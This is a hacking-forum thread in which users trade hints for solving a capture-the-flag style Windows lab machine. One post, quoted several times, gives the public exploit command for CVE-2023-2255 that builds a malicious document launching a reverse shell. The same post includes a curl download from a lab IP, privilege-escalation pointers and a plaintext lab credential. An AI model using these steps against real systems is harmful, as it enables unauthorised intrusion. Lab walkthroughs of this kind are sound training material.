Possibly Related Threads…

CipherGhost · Feb 18, 2024, 05:19 AM

can anyone give me all step in one chat i got cunfused so much

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

KillerWhale · Feb 18, 2024, 06:04 AM

any ideas on root?

GWTW · Feb 18, 2024, 07:30 AM

Any hints for root flag??

Aldy got the tstark reverse shell.

DwightSchrute · Feb 18, 2024, 09:07 AM

i have the tstark shell and the user flag.
from there on i have no idea how to move forward.

could somebody please explain how to get the hash of ppots from xampp and resume.php?
Cant figure out how to get it from there...
help is appreciated Smile

query1338 · Feb 18, 2024, 12:27 PM

Is the intended root way, using the SeMachineAccountPrivilege?

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

gtastav · Feb 18, 2024, 01:04 PM

I got it via intended and unintended !
This machine was complicated.
If you want the unintended way which is much easier , you must pivot on the machine and get port for mysql service , then run with the credentials for the root you got from the first CVE execution , Then you need to upload the lib/plugin file to the plugins directory then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled *
then you rooted it.
For the intended way you need to get access to the potts which is easy pz lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER :
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(ITS DOWNLOADING THE odt FILE, MUST BE TO > C:\xampp\htdocs\internal\applications\azerty.odt)
then you get a shell on the listener as the ppotts user.
now do :
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions.From here its easy! good luck!

fdsfsdgsgfsfds324 · Feb 18, 2024, 01:35 PM

(Feb 18, 2024, 01:04 PM)gtastav Wrote: I got it via intended and unintended !
This machine was complicated.
If you want the unintended way which is much easier , you must pivot on the machine and get port for mysql service , then run with the credentials for the root you got from the first CVE execution , Then you need to upload the lib/plugin file to the plugins directory then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled *
then you rooted it.
For the intended way you need to get access to the potts which is easy pz lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER :
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(ITS DOWNLOADING THE odt FILE, MUST BE TO > C:\xampp\htdocs\internal\applications\azerty.odt)
then you get a shell on the listener as the ppotts user.
now do :
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions.From here its easy! good luck!

What do you mean find the SQL port?
My nmap does not find anything closely related to that...! I already have the root:password for the DB but kind of lost where to go know.
Already tried to enumerate all the things, and also don't know how did you guys found out the tstark username...

Any hints please?

GWTW · Feb 18, 2024, 02:01 PM

Try the directory

C:\Windows\Temp\

intersteller2038 · Feb 18, 2024, 02:11 PM

(Feb 18, 2024, 01:47 PM)fatgirl Wrote:
(Feb 18, 2024, 01:35 PM)fdsfsdgsgfsfds324 Wrote:
(Feb 18, 2024, 01:04 PM)gtastav Wrote: I got it via intended and unintended !
This machine was complicated.
If you want the unintended way which is much easier , you must pivot on the machine and get port for mysql service , then run with the credentials for the root you got from the first CVE execution , Then you need to upload the lib/plugin file to the plugins directory then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled *
then you rooted it.
For the intended way you need to get access to the potts which is easy pz lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER :
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(ITS DOWNLOADING THE odt FILE, MUST BE TO > C:\xampp\htdocs\internal\applications\azerty.odt)
then you get a shell on the listener as the ppotts user.
now do :
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions.From here its easy! good luck!

What do you mean find the SQL port?
My nmap does not find anything closely related to that...! I already have the root:password for the DB but kind of lost where to go know.
Already tried to enumerate all the things, and also don't know how did you guys found out the tstark username...

Any hints please?

that poster didnt hack it on their own they wont be able to help you much further.

here is your gift

OFFICE\web_account:verytoughpassword123!

Can you please tell me where exactly you found this?

GWTW · Feb 18, 2024, 02:25 PM

(Feb 18, 2024, 01:35 PM)fdsfsdgsgfsfds324 Wrote:
(Feb 18, 2024, 01:04 PM)gtastav Wrote: I got it via intended and unintended !
This machine was complicated.
If you want the unintended way which is much easier , you must pivot on the machine and get port for mysql service , then run with the credentials for the root you got from the first CVE execution , Then you need to upload the lib/plugin file to the plugins directory then you get more creds to then run *something that has to do with the privilege SeImpersonatePrivilege Impersonate a client after authentication Enabled *
then you rooted it.
For the intended way you need to get access to the potts which is easy pz lemon squeezy:
https://github.com/elweth-sec/CVE-2023-2255
then
python CVE-2023-2255.py --cmd "c:\users\public\shell.exe" --output azerty.odt

ON THE TSTARK USER :
C:\xampp\htdocs\> curl http://10.10.XX/azerty.odt -o azerty.odt
(ITS DOWNLOADING THE odt FILE, MUST BE TO > C:\xampp\htdocs\internal\applications\azerty.odt)
then you get a shell on the listener as the ppotts user.
now do :
Get-WmiObject -Class Win32_ComputerSystem | Select-Object UserName
You see multiple sessions.From here its easy! good luck!

What do you mean find the SQL port?
My nmap does not find anything closely related to that...! I already have the root:password for the DB but kind of lost where to go know.
Already tried to enumerate all the things, and also don't know how did you guys found out the tstark username...

Any hints please?

mysql port is 3306 and it's running on the localhost, so you may need to portfoward!

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Dante - complete writeup written by Tamarisk	Tamarisk	602	91,590	27 minutes ago Last Post: sabero_exe
	[FREE] CPTS 12 FLAGS	pulsebreaker	68	1,944	9 hours ago Last Post: VictorPipeau
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	371	92,799	10 hours ago Last Post: phannguyenbaouy1
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	21	2,616	Today, 05:08 AM Last Post: popoler
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,269	Yesterday, 02:10 PM Last Post: kkkato